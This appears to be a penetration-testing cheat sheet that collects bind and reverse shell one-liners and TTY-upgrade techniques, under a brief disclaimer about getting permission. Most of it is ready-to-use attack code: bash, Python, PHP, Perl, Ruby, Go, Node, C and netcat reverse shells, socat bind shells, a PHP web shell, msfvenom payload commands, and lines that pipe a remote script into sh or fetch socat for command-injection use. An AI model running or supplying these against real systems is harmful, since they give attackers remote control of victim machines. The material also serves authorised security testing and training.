{% hint style="success" %} Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. {% endhint %}
TODO: description, methodology, and script prep for each section (issue #15)
- Add description and methodology as needed for each section
- Prep all code examples for scripting (replace IPs and ports with variables, etc.)
- Ensure code examples' variables are appropriate for their respective programming language
Bind shells are used when the attacker connects directly to the victim.
socat - TCP4:$victim_ip:$port
{% hint style="info" %}
The dash -
is required to transfer keyboard data back and forth between the machines.
{% endhint %}
To create an encrypted bind shell, first a self-signed certificate must be created. It must either be created on the victim machine, or transferred prior to using the bind shell.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
This command will create a new 2048-bit encryption key and certificate using the RSA algorithm. The certificate will be valid for 365 days. The key and certifcate information must be combined into one .pem file using cat
.
Next, use socat to create the bind shell using this .pem certificate. verify=0
will be used to disable SSL verification. Since you are using SSL on port 443 you need to run the listener with sudo
if the victim machine is running Linux.
#listener on victim
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:"C:\Windows\System32\cmd.exe"
#attacker client
socat - OPENSSL:$IP:443,verify=0
Reverse shells are used when the attacker gets the victim machine to connect back to their machine. Useful when firewalls or other security devices prevent bind shells.
Reverse Shell as a Service - https://shell.now.sh
https://github.com/lukechilds/reverse-shell
curl https://shell.now.sh/<ip>:<port> | sh
bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
sh -i >& /dev/udp/192.168.1.2/5555 0>&1
0<&196;exec 196<>/dev/tcp/$ip/$port; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/$ip/$port && while read line 0<&5; do $line 2>&5 >&5; done
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.57",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
python -c 'import socket,pty,os;lhost = "10.10.15.80"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();
#UDP Socat Listener
socat file:`tty`,echo=0,raw udp-listen:100
php -r '$sock=fsockopen("192.168.1.2",80);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
<?php system($_GET['variable_name']); ?>
ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
mknod backpipe p && telnet $ip $port 0<backpipe | /bin/bash 1>backpipe
telnet $ip $port1 | /bin/bash | telnet $ip $port2
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p
nc -e /bin/sh 192.168.1.2 80
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p
rm -f /var/tmp/backpipe
mknod /var/tmp/backpipe p
nc $attack_ip $port 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe
socat tcp-connect:$IP:$port exec:"bash -li",pty,stderr,setsid,sigint,sane
#Listener on attacker machine
socat -d TCP-LISTEN:$port file:`tty`,raw,echo=0
#From victim
socat TCP4:$IP:$port exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane
-d
increases verbosity of output
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
perl -e 'use Socket;$i="192.168.1.2";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
int main ()
{
const char* ip = "192.168.1.2";
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
inet_aton(ip, &addr.sin_addr);
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++)
{
dup2(sockfd, i);
}
execve("/bin/sh", NULL, NULL);
return 0;
}
# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1
# Then remember to authorise on your system the target IP to connect to you
xterm -display 127.0.0.1:1
# Run this INSIDE the spawned xterm on the open X Server
xhost +targetip
# Then on the target connect back to the your X Server
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm
- Linux Non-Staged reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
- Linux Staged reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
After catching a shell through netcat, you are placed in a shell that has very limited functionality. If the remote machine has python or python3 installed you can easily upgrade to a fully functional TTY shell.
Note: To check if the shell is a TTY shell use the tty
command.
#On victim machine
python -c 'import pty;pty.spawn("/bin/bash")'; #spawn python psuedo-shell
ctrl-z #send to background
#On attacker's machine
stty raw -echo #https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x
stty size #get local number of rows & columns
fg #to return shell to foreground
#On victim machine
export SHELL=bash
stty rows $x columns $y #Set remote shell to x number of rows & y columns
export TERM=xterm-256color #allows you to clear console, and have color output
When using some shells such as zsh
or fish
on the attacking machine your shell will break after you try to upgrade it using this method. Some of the things I have found that help mitigate this are:
- Use
rlwrap nc -lvnp
when setting up your listener, - make sure not to put a space in your python pty command after the import,
- type
stty size;stty raw -echo;fg
all on one line.
Finally, as a last resort, you could just switch to bash
instead when setting up your nc
listener.
echo os.system('/bin/bash')
/bin/sh -i
#python3
python3 -c 'import pty; pty.spawn("/bin/sh")'
#perl
perl -e 'exec "/bin/sh";'
#ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
#lua
lua -e "os.execute('/bin/sh')"
Upgrade from a basic shell to a bash TTY using script
.
SHELL=/bin/bash script -q /dev/null
If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.
#Create a script called `sh.exp`
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
Another option is to upload the binary for socat
to the victim machine and magically get a fully interactive shell. Download the appropriate binaries from https://github.com/andrew-d/static-binaries. Socat needs to be on both machines for this to work.
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444
This one-liner can be injected wherever you can get command injection for an instant reverse shell. Point the path to the binary to your local http server if internet access is limited on the victim.
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444
bash -i >& /dev/tct/10.10.14.148/9001 0>&1
#URL encoded:
bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
- Works more reliably when prefixed with
bash -c
(thanks Ippsec!)
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here. (broken link?)
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip
- http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- http://pentestmonkey.net/blog/post-exploitation-without-a-tty
- https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
If you like this content and would like to see more, please consider buying me a coffee!